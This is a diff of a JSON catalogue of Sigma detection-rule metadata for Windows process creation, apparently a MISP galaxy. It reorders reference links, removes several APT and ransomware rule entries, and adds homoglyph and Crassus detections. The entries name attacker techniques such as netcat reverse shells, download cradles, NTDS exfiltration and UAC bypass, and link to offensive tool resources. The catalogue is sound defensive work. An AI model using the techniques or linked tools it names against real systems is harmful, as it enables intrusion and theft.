@@ -68105,10 +65235,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/",
"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
"https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad",
+ "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"
],
"tags": [
@@ -68175,8 +65305,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/cube0x0",
"https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
+ "https://github.com/cube0x0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml"
],
"tags": "No established tags"
@@ -68217,42 +65347,6 @@
"uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19",
"value": "HackTool - Impacket Tools Execution"
},
- {
- "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/09/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt27_emissary_panda.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/",
- "https://twitter.com/cyb3rops/status/1168863899531132929",
- "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt27_emissary_panda.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002",
- "attack.g0027"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014",
- "value": "APT27 - Emissary Panda Activity"
- },
{
"description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.",
"meta": {
@@ -68332,9 +65426,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49",
"https://github.com/sensepost/ruler",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml"
],
"tags": [
@@ -68375,11 +65469,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/aceresponder/status/1636116096506818562",
- "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/",
- "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png",
- "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
"https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/",
+ "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
+ "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/",
+ "https://twitter.com/aceresponder/status/1636116096506818562",
+ "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml"
],
"tags": [
@@ -68400,27 +65494,6 @@
"uuid": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555",
"value": "Suspicious WebDav Client Execution"
},
- {
- "description": "Detects command line patterns used by BlackByte ransomware in different operations",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/02/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_blackbyte_ransomware.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/blackbyte-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_blackbyte_ransomware.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "999e8307-a775-4d5f-addc-4855632335be",
- "value": "Potential BlackByte Ransomware Activity"
- },
{
"description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.",
"meta": {
@@ -68434,8 +65507,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/nas_bench/status/1618021838407495681",
"https://twitter.com/nas_bench/status/1618021415852335105",
+ "https://twitter.com/nas_bench/status/1618021838407495681",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml"
],
"tags": [
@@ -68510,8 +65583,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html",
"https://redcanary.com/blog/child-processes/",
+ "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml"
],
"tags": [
@@ -68578,8 +65651,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html",
"https://lolbas-project.github.io/lolbas/Binaries/Cmstp/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"
],
@@ -68622,10 +65695,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
"https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
- "https://twitter.com/vysecurity/status/873181705024266241",
"https://twitter.com/vysecurity/status/974806438316072960",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
+ "https://twitter.com/vysecurity/status/873181705024266241",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"
],
"tags": [
@@ -68732,9 +65805,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/",
"https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml"
],
"tags": [
@@ -68800,8 +65873,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview",
"https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview",
"https://github.com/tevora-threat/SharpView/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml"
],
@@ -68867,9 +65940,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
- "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"
],
"tags": [
@@ -68890,40 +65963,6 @@
"uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658",
"value": "UAC Bypass WSReset"
},
- {
- "description": "Detects Ryuk ransomware activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/12/16",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_ryuk.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
- "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844",
- "value": "Potential Ryuk Ransomware Activity"
- },
{
"description": "Detects the execution of DeviceCredentialDeployment to hide a process from view",
"meta": {
@@ -68970,8 +66009,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml"
],
"tags": [
@@ -69123,9 +66162,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
"https://nmap.org/ncat/",
"https://www.revshells.com/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml"
],
"tags": [
@@ -69158,10 +66197,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
"https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml"
],
@@ -69263,9 +66302,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://ss64.com/ps/foreach-object.htmll",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
"https://ss64.com/nt/for.html",
- "https://ss64.com/ps/foreach-object.htmll",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml"
],
"tags": [
@@ -69498,8 +66537,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://h.43z.one/ipconverter/",
+ "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml"
],
"tags": [
@@ -69544,38 +66583,46 @@
"value": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE"
},
{
- "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report",
+ "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/10",
+ "author": "Micah Babinski, @micahbabinski",
+ "creation_date": "2023/05/07",
"falsepositive": [
- "Unknown"
+ "Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use."
],
- "filename": "proc_creation_win_apt_evilnum_jul20.yml",
- "level": "critical",
+ "filename": "proc_creation_win_homoglyph_cyrillic_lookalikes.yml",
+ "level": "medium",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml"
+ "http://www.irongeek.com/homoglyph-attack-generator.php",
+ "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_homoglyph_cyrillic_lookalikes.yml"
],
"tags": [
"attack.defense_evasion",
- "attack.t1218.011"
+ "attack.t1036",
+ "attack.t1036.003"
]
},
"related": [
{
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0",
- "value": "EvilNum APT Golden Chickens Deployment Via OCX Files"
+ "uuid": "32e280f1-8ad4-46ef-9e80-910657611fbc",
+ "value": "Potential Homoglyph Attack Using Lookalike Characters"
},
{
"description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique",
@@ -69634,39 +66681,6 @@
"uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8",
"value": "Suspicious Process Created Via Wmic.EXE"
},
- {
- "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/10/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_aptc12_bluemushroom.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "related": [
- {
- "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0",
- "value": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32"
- },
{
"description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)",
"meta": {
@@ -69680,10 +66694,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
+ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml"
],
"tags": [
@@ -69798,8 +66812,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup",
"https://twitter.com/Oddvarmoe/status/1641712700605513729",
+ "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml"
],
"tags": [
@@ -69825,10 +66839,10 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
- "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
- "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/",
"https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee",
+ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
+ "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml"
],
"tags": [
@@ -70010,8 +67024,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py",
"https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1",
+ "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml"
],
"tags": [
@@ -70174,8 +67188,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/Kevin-Robertson/Inveigh",
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://github.com/Kevin-Robertson/Inveigh",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml"
],
"tags": [
@@ -70242,8 +67256,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
+ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml"
],
"tags": [
@@ -70309,8 +67323,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
+ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml"
],
"tags": [
@@ -70444,11 +67458,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://isc.sans.edu/diary/22264",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://isc.sans.edu/diary/22264",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml"
],
"tags": [
@@ -70491,8 +67505,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/nao_sec/status/1530196847679401984",
"https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/",
+ "https://twitter.com/nao_sec/status/1530196847679401984",
"https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/",
"https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml"
@@ -70556,9 +67570,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
"https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html",
"https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/",
+ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml"
],
"tags": [
@@ -70591,8 +67605,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/GelosSnake/status/934900723426439170",
"https://asec.ahnlab.com/en/39828/",
+ "https://twitter.com/GelosSnake/status/934900723426439170",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml"
],
"tags": [
@@ -70613,18 +67627,19 @@
"value": "System File Execution Location Anomaly"
},
{
- "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression",
+ "description": "Detects PowerShell download and execution cradles.",
"meta": {
"author": "Florian Roth (Nextron Systems)",
"creation_date": "2022/03/24",
"falsepositive": [
- "Scripts or tools that download files and execute them"
+ "Some PowerShell installers were seen using similar combinations. Apply filters accordingly"
],
"filename": "proc_creation_win_powershell_download_iex.yml",
"level": "high",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
"https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml"
],
@@ -70643,7 +67658,7 @@
}
],
"uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775",
- "value": "PowerShell Web Download and Execution"
+ "value": "PowerShell Download and Execution Cradles"
},
{
"description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)",
@@ -70692,8 +67707,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml"
],
"tags": [
@@ -70825,9 +67840,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Winrm/",
"https://twitter.com/bohops/status/994405551751815170",
"https://redcanary.com/blog/lateral-movement-winrm-wmi/",
+ "https://lolbas-project.github.io/lolbas/Scripts/Winrm/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"
],
"tags": [
@@ -70860,8 +67875,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml",
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml"
],
"tags": [
@@ -70914,40 +67929,6 @@
"uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4",
"value": "Potential PowerShell Obfuscation Via Reversed Commands"
},
- {
- "description": "Detects a command used by conti to exfiltrate NTDS",
- "meta": {
- "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_conti_7zip.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1560"
- ]
- },
- "related": [
- {
- "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41",
- "value": "Conti NTDS Exfiltration Command"
- },
{
"description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)",
"meta": {
@@ -70980,6 +67961,39 @@
"uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab",
"value": "Process Creation Using Sysnative Folder"
},
+ {
+ "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.",
+ "meta": {
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_pua_crassus.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/vu-ls/Crassus",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_crassus.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1590.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e3b168bd-fcd7-439e-9382-2e6c2f63514d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "2c32b543-1058-4808-91c6-5b31b8bed6c5",
+ "value": "PUA - Crassus Execution"
+ },
{
"description": "Detects usage of winget to add new additional download sources",
"meta": {
@@ -70993,8 +68007,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
